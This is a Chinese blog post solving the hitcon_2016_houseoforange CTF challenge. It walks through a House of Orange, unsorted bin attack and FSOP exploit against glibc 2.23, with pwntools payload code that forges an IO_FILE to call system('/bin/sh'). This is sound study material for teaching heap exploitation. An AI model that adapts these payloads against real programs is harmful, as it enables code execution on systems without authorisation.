House of orange & Unsortedbin Attack & FSOP

已于 2023-12-12 11:46:24 修改
阅读量81 收藏
点赞数
分类专栏: PWN 文章标签: linux 安全 系统安全 python
于 2023-12-12 11:39:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55700752/article/details/134941086
版权
PWN 同时被 2 个专栏收录
13 篇文章 0 订阅
订阅专栏
4 篇文章 0 订阅
订阅专栏

参考 https://www.cnblogs.com/ZIKH26/articles/16712469.html

例题:hitcon_2016_houseoforange

在这里插入图片描述
main函数:
没有free堆块的函数
在这里插入图片描述
add函数:
由两个malloc和一个calloc组成,第一个malloc和calloc的chunk大小均为0x20,第二个malloc的chunk大小可根据用户输入指定大小

在这里插入图片描述
edit函数:
在更改name时,可指定length,存在堆溢出。
在这里插入图片描述
在这里插入图片描述
show函数:
调用printf进行输出,需要注意"\x00"截断问题。
在这里插入图片描述

思路 libc2.23

由于题目不存在free函数,因此需要借助 house of orange 来产生unsorted bin的堆块,
利用 show函数 打印unsorted bin堆块的内容,获取libc和堆地址
修改chunk的bk指针为_IO_list_all-0x10,利用 unsorted bin attack 将 main_arena+88 写入 _IO_list_all ,
伪造_IO_list_all中的内容,修改vtable->_IO_file_overflow为system函数,根据下面函数调用链调用函数
__libc_malloc->malloc_printerr->libc_message->abort->_IO_flush_all_lockp

leak 地址

houseoforange 释放top chunk 进入 unsortedbin

add(0x10,b"a")
edit(0x40,b"b"*0x18+p64(0x21)+p64(0)+p64(0)+p64(0)+p64(0xfa1))
add(0x1000,b"c"*8)

首先malloc堆块,然后利用堆溢出修改top chunk的size字段,最后malloc一个比top chunk size大的堆块,即可将top chunk 释放到unsorted bin中
在这里插入图片描述

    add(0x400,b"d"*0x8)# 防止printf遇到 "\x00" 停止打印
    show()
    leak_libc = get_addr_64()
    lg("leak_libc",leak_libc)
    # db()
    libc_base = leak_libc - 0x3c5188
    lg("libc_base",libc_base)
    io_list_all=libc_base+libc.symbols['_IO_list_all']
    sys_addr=libc_base+libc.symbols['system']
    edit(0x20,'e'*0x10)# 将fd bk指针覆盖,防止printf遇到 "\x00" 停止打印
    show()
    leak_heap = u64(rcu(b"\x0a")[-7:-1].ljust(8,b"\x00"))
    # .recvuntil('e'*0x10)
    # leak_heap=u64(p.recv(6).ljust(8,b'\x00'))
    lg("leak_heap",leak_heap)

add(0x400,b"d"*0x8)这行代码很重要,
分配堆块时程序遍历unsorted bin,未找到符合要求的chunk,会将 old top chunk 放入largebin中,此时该chunk中存在fd bk fd_nextsize bk_nextsize指针,然后程序遍历largebin,切割 0x410 大小的chunk 作为分配堆块,该chunk中残留 fd bk fd_nextsize bk_nextsize,可泄露地址。
在这里插入图片描述
同时由于64位地址前两个字节为0,printf输出会截断,因此第一次覆盖fd,只能打印 bk,获取libc地址
第二次需要将fd和bk均覆盖,才能打印 fd_nextsize,获取堆地址

unsorted bin attack

利用堆溢出修改 top chunk 的内容,修改bk指针为_IO_list_all-0x10

	payload=b'f'*0x400
    payload+=p64(0)+p64(0x21)
    payload+=p64(0)+p64(0) # 填充 old topchunk 前的内容
    payload+=b'/bin/sh\x00'+p64(0x61) #old top chunk prev_size & size 同时也是fake file的_flags字段
    payload+=p64(0)+p64(io_list_all-0x10) #old top chunk fd & bk

FSOP

链表头_IO_list_all指向main_arena+88,查看此时_IO_list_all结构体的内容
在这里插入图片描述
在这里插入图片描述
查看 _chain字段的地址,是smallbin中size为0x60的数组的位置,该字段链接IO_FILE结构体
如果有smallbin中大小为0x60的堆块,那么修改该堆块的内容即可伪造IO_FILE结构体(第二个IO_FILE)

让smallbin中出现一个0x60的堆块的方法是提前用edit函数来篡改位于unsorted bin中堆块的size,然后再次调用malloc函数的时候会去遍历各个bins,遍历unsorted bin的时候会将该bins的堆块进行分类(放入small bin或者large bin中)
因此篡改size为0x60,所以该堆块便会进入small bin中size为0x60的链表中。再次分配出来时,即可控制第二个IO_FILE结构体
在这里插入图片描述
成功将 _chain字段修改为smallbin 0x60的堆块地址,即我们可以控制第二个_IO_FILE结构体的内容
接下来进行FSOP伪造_IO_FILE,
规则:mode=0,_IO_write_ptr=1,_IO_write_base=0,绕过if判断
同时还要将_flags字段写入/bin/sh,因为_IO_OVERFLOW第一个参数是 _IO_FILE指针

      if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
	   || (_IO_vtable_offset (fp) == 0
	       && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
				    > fp->_wide_data->_IO_write_base))
	   )
	  && _IO_OVERFLOW (fp, EOF) == EOF)
	result = EOF;

还需要修改vtable中_IO_OVERFLOW指针为system函数地址

    payload=b'f'*0x400
    payload+=p64(0)+p64(0x21)
    payload+=p64(0)+p64(0)
    payload+=b'/bin/sh\x00'+p64(0x61) #old top chunk prev_size & size 同时也是fake file的_flags字段
    payload+=p64(0)+p64(io_list_all-0x10) #old top chunk fd & bk
    payload+=p64(0)+p64(1)#_IO_write_base & _IO_write_ptr
    payload+=p64(0)*7
    payload+=p64(leak_heap+0x430)#chain
    payload+=p64(0)*13
    payload+=p64(leak_heap+0x508)#vtable
    payload+=p64(0)+p64(0)+p64(sys_addr)#DUMMY finish overflow

在这里插入图片描述
在这里插入图片描述

FSOP的成功率只有1/2?

由于触发了_IO_flush_all_lockp函数,会根据_IO_list_all和chain字段来去依次遍历链表上的每个结构体,在我们整体布局完成后,第一个结构体就是从main_arena+88开始。而第一个结构体的mode字段是main_arena+88+0xc0处的数据决定的。mode字段是四字节

而上面这个地址由于libc地址随机化
导致这个值的补码可能是正也可能是负,也就是说这四个字节可能是0到0xffffffff之间的任意值,但是如果大于0x7fffffff的话该值就为负,小于则为正。这个0xffffffff/2的值
正好就是最大的正值为0x7fffffff 所以刚好_mode字段为负的概率是1/2

那为啥非要这个mode字段为负才行呢?

因为倘若mode为正,则上面if检查的这部分fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr

fp->_wide_data->_IO_write_base 就会成立。这样就会触发_IO_OVERFLOW函数(可此时在遍历第一个IO_FILE结构体),但是我们的布局是在第二个IO_FILE结构体上,我们需要的是遍历到第二个IO_FILE结构体的时候触发
IO_OVERFLOW函数。如果遍历第一个结构体时触发了_IO_OVERFLOW函数,程序则会崩溃,因为我们无法控制vtable表项

攻击

由于FSOP的成功率只有1/2,多次尝试即可
在这里插入图片描述

看海就会失去海
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
House of apple 一种新的glibc中IO攻击方法.doc
07-09
House of Apple 方法的优点在于,它可以在高版本 glibc 中实施 IO 攻击,并且可以在仅使用一次 largebin attack 并限制读写次数的条件下进行 FSOP 利用。同时,该方法也可以避免使用多次写操作,从而提高攻击成功率...
House Of Orange
qq_45595732的博客
11-26 1008
House Of Orange 本质:Unsorted bin attackFSOP造成的组合漏洞利用方式。 House of orange源于一道题目,有时候只用到free top chunk的题目也会被归入该类中。 glibc版本&lt;=2.23情况 特点:不需要free操作 核心原理: 1,获取unsorted bin ​ 在_int_malloc函数中,会依次检验 fastbin、small bins、unsorted bin、large bins 是否可以满足分配要求,因为尺寸问
一种用於空间光通信系统的FSOP及应用 (2005年)
05-15
提出一种可用于空间光通信系统的通信协议(FSOP)。该协议在光路的物理连接之上建立一种可进行数据传输的逻辑链路,该链路具有数据实时备份、出错即时恢复等机制以保证传输数据的安全与可靠。本文提供的通信协议可以...
FE8_1_SSOP16_V1_3.pdf
01-27
文档&quot;FE8_1_SSOP16_V1_3.pdf&quot;是关于TERMIN汤铭公司生产的FE8.1 USB 2.0 Hub芯片的应用设计参考资料。这个芯片主要用于扩展USB接口,允许多个设备同时连接到一个单一的USB端口。这份资料详细介绍了如何正确设计和布局...
Java项目组开发规范.pdf
07-29
第一章概述中,编写目的明确指出规范的制定是为了规范FSOP项目的开发流程,提高软件质量,缩短开发周期,并强调代码的可重用性和易读性。面向读者主要是参与FSOP项目开发和实施的人员。名词讲明部分则对手册中涉及的...
PhoenixCard_V3.0.8 TF卡烧录工具
04-17
4. `fstool.dll`、`lua5.1.dll`、`ImageOps.dll`、`FsOp.dll`、`FsOp2.dll`、`luaBase.dll`、`CommonFun.dll`:这些都是动态链接库文件,它们包含了软件运行所需的函数和模块。例如,`lua5.1.dll`是Lua脚本引擎,...
Linux中的环境变量
qhy850716的博客
07-17 425
我们思考这样一个问题:指令也是可执行程序,我们写好的编译好的c语言也是程序,为什么我们在执行c语言程序时要./a.out带上当前路径,而ls这种指令就不要带路径呢?这就是环境变量PATH的作用,Linux中存在一些全局设置,表明命令行解释器应该去哪个路径下寻找可执行程序。系统中的很多配置在我们登录Linux时就已经被加载到bash中了,也就是内存。
LINUX:懒汉单例模式线程池
W2155的博客
07-16 478
创建一个线程,就是要这个线程去完成某种任务的。池化技术就是,提前创建一批线程,有任务这一批线程就会执行。而不是有任务的时候在去创建线程。池化技术有着更高的效率,因为线程都是提前创建好的,直接执行任务。
Qmi8658a姿态传感器使用心得(2)linux
Starry的博客
07-19 941
COD 原理,CTRL9,自检(详细代码示例)
【Linux杂货铺】期末总结篇4:shell编程
聆风吟的博客
07-17 4095
本文主要分享作者本人期末复习的总结,欢迎大家借鉴浏览。
linux centos nginx 报错 client intended to send too large body: 104853014 bytes问题
qq_42250832的博客
07-17 324
这个错误通常发生在Web服务器处理HTTP请求时,当客户端尝试发送的请求体(body)大小超过了服务器配置的限制时。错误信息 “client intended to send too large body: 104853014 bytes” 表示客户端想要发送的数据量超过了100MB,这通常是由于客户端尝试上传一个非常大的文件或者提交了一个非常大的表单。增加服务器接收请求体的大小限制。这通常可以通过配置文件来实现,例如,如果你使用的是Nginx,可以修改client_max_body_size指令。
文件在Linux下为binary格式在Windows下为utf-8格式
qq_38220334的博客
07-17 336
想着是不是之前遇到的问题,有可能是文件中含有特殊字符,然后用vim命令来编辑这个文件,发现,还真是含有一个特殊字符,然后将它删除掉,文件就变成utf-8格式的文件了。在Windows下和Mac下都是没有问题的,在华为云服务器上也是没问题的(操作系统不是centos),但是在自己搭建的Linux服务器(centos)上是有问题的。用shell或者Python脚本去将这个文件转为utf-8格式的,但是都失败了。
Linux(CentOS7)部署PHP-7.2.17源码包
thetender的博客
07-18 1037
LAMP系统安装 通过PHP的源码包部署PHP-7.2.17版本
Linux 注意事项
最新发布
m0_74012211的博客
07-19 501
Linux 与 Windows 是两个相互独立的操作系统,两者有较大差距
【Linux】文件管理常用命令【超详细】
2301_82023330的博客
07-16 734
这篇博客介绍了Linux系统中的常用文件管理命令,包括`ls`、`cd`、`cp`、`mv`、`rm`和`mkdir`等。通过这些命令,用户可以高效地浏览目录、复制和移动文件、删除文件以及创建新目录。文章详细讲解了每个命令的基本用法和常见选项,并通过实例演示了这些命令在实际操作中的应用,帮助读者掌握文件管理的基本技能,提升Linux系统的使用效率。
单链表算法 - 环形链表II
黎相思的技术博客
07-17 465
- 备战技术面试?力扣提供海量技术面试资源,帮助你高效提升编程技能,轻松拿下世界 IT 名企 Dream Offer。那么为什么相遇点和头节点到入环节点的距离是相等的。. - 力扣(LeetCode)
【Linux】基本指令
2302_79031646的博客
07-16 603
Linux基本指令
Linux上的系统服务——DNS、WEB、NFS 和 AutoFS 服务的详细配置步骤
qq_68600196的博客
07-17 694
现有主机 node01 和 node02,完成如下需求:1、在 node01 主机上提供 DNS 和 WEB 服务2、dns 服务提供本实验所有主机名解析3、web服务提供 www.rhce.com 虚拟主机4、该虚拟主机的documentroot目录在 /nfs/rhce 目录5、该目录由 node02 主机提供的NFS服务共享6、该目录可以通过autofs服务实现自动挂载7、所有服务应该在重启之后依然可以正常使用。
[Linux+git+Gitee+Jenkins]持续集成实验安装配置详细
wumingzei的博客
07-16 1474
在Linux基于docker搭建一个Jenkins项目环境,包括git,gitee,jdk,maven等的安装配置过程记录。
FSOP项目Java与数据库开发规范
第一章概述指出,编写开发规范的目的是为了规范FSOP项目的开发实施工作,提升软件质量,缩短开发周期,并增强代码的可重用性和可读性,便于维护和团队间的沟通协作。规范面向参与FSOP项目开发和实施的所有相关人员。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值